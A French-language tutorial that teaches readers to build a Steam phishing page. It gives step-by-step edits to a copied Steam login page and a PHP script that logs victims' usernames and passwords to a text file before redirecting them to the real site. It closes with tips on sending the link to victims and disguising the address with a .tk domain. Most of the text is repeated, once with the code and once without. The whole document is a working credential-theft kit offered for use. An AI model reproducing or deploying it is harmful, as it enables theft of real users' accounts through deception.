Je vais vous présenter un tutoriel pour le Phishing
Il vous faut posséder
=========================
un compte ftp avec filezilla
le post.php ----->
À enregistrer sous post.php
=========================
Nous allons créer une page de phishing steam
Rendez a l'adresse https://store.steampowered.com/login/
Faite clic droit --> voir le code source
Sélectionnez tout, copiez, ouvrez votre bloc note, collez, enregistrez sous le nom index.html.
Maintenant les modifications:
Le site de steam utilise désormais du Javascript pour se logger et non plus du php, par conséquent il faut bricoler un peu pour convertir ça en php:
-Cherchez:
PS: Si votre page est en français vous devrez rechercher un <span>Connexion</span>
Entourez le de commentaire html: <!-- -->
De cette manière:
Ensuite tu vous cherchez (toujours dans le code source): " <form name="logon" "
Quand vous l'avez, supprimez toute la ligne et écrivez à la place: <form name="logon" action="post.php" method="POST">
Ensuite cherchez: "<input type="hidden" name="loginfriendlyname" id="loginfriendlyname">"
En dessous de cette ligne vous rajouterez: <INPUT TYPE="submit" NAME="submit" VALUE="Connexion " class="btnv6_blue_hoverfade btn_medium">
Maintenant allez dans filezilla et uploader vos deux fichier : index.html et post.php
Rendez-vous sur votre site internet.
Vous aller voir apparaître deux nouveau fichier (logique) cliquez sur index.html et voici votre fausse page .
Vous pouvez la tester vous recevrez les identifiants écris, il vous suffit d'envoyer le lien qui est afficher en haut de la fausse page .
Mais vous vous dite surement que dudule75.free.fr/index.html ce n'est pas très crédible.
Il existe donc plusieur site internet qui remanie votre lien comme par exemple :
http://www.dot.tk/fr/pageA00C1A.html
Rentrer le lien de votre fausse page puis page suivante choisissez l'adresse web pour que votre lien pour soit renommé. Attention ce site n'accepte que les tirés entre chaque mots !
exemple : steam-connexion.TK
EDIT _47: tuto mis à jour pour la dernière version du site de steam (javascript) - 30/11/2014
Il vous faut posséder
=========================
un compte ftp avec filezilla
le post.php ----->
Code PHP:
<?php // Ce script va ouvrir un fichier username.txt, inscrire les données du formulaire et refermer le fichier.
$fp = fopen ("username.txt", "a");
fputs($fp, "\n");
fputs ($fp, "login : ".$_POST['username']);
fputs ($fp, " / password : ".$_POST['password']);
fclose ($fp);
?>
<?php // Ce script va faire une redirection automatique vers l'adresse de mon choix
header('Location: https://store.steampowered.com/login/');
exit;
?>
=========================
Nous allons créer une page de phishing steam
Rendez a l'adresse https://store.steampowered.com/login/
Faite clic droit --> voir le code source
Sélectionnez tout, copiez, ouvrez votre bloc note, collez, enregistrez sous le nom index.html.
Maintenant les modifications:
Le site de steam utilise désormais du Javascript pour se logger et non plus du php, par conséquent il faut bricoler un peu pour convertir ça en php:
-Cherchez:
Code HTML:
<a href="javascript:DoLogin()" class="btnv6_blue_hoverfade btn_medium"> <span>Sign in</span></a>
Entourez le de commentaire html: <!-- -->
De cette manière:
Code HTML:
<!-- <a href="javascript:DoLogin()" class="btnv6_blue_hoverfade btn_medium"> <span>Sign in</span></a> -->
Quand vous l'avez, supprimez toute la ligne et écrivez à la place: <form name="logon" action="post.php" method="POST">
Ensuite cherchez: "<input type="hidden" name="loginfriendlyname" id="loginfriendlyname">"
En dessous de cette ligne vous rajouterez: <INPUT TYPE="submit" NAME="submit" VALUE="Connexion " class="btnv6_blue_hoverfade btn_medium">
Maintenant allez dans filezilla et uploader vos deux fichier : index.html et post.php
Rendez-vous sur votre site internet.
Vous aller voir apparaître deux nouveau fichier (logique) cliquez sur index.html et voici votre fausse page .
Vous pouvez la tester vous recevrez les identifiants écris, il vous suffit d'envoyer le lien qui est afficher en haut de la fausse page .
Mais vous vous dite surement que dudule75.free.fr/index.html ce n'est pas très crédible.
Il existe donc plusieur site internet qui remanie votre lien comme par exemple :
http://www.dot.tk/fr/pageA00C1A.html
Rentrer le lien de votre fausse page puis page suivante choisissez l'adresse web pour que votre lien pour soit renommé. Attention ce site n'accepte que les tirés entre chaque mots !
exemple : steam-connexion.TK
EDIT _47: tuto mis à jour pour la dernière version du site de steam (javascript) - 30/11/2014
Commentaire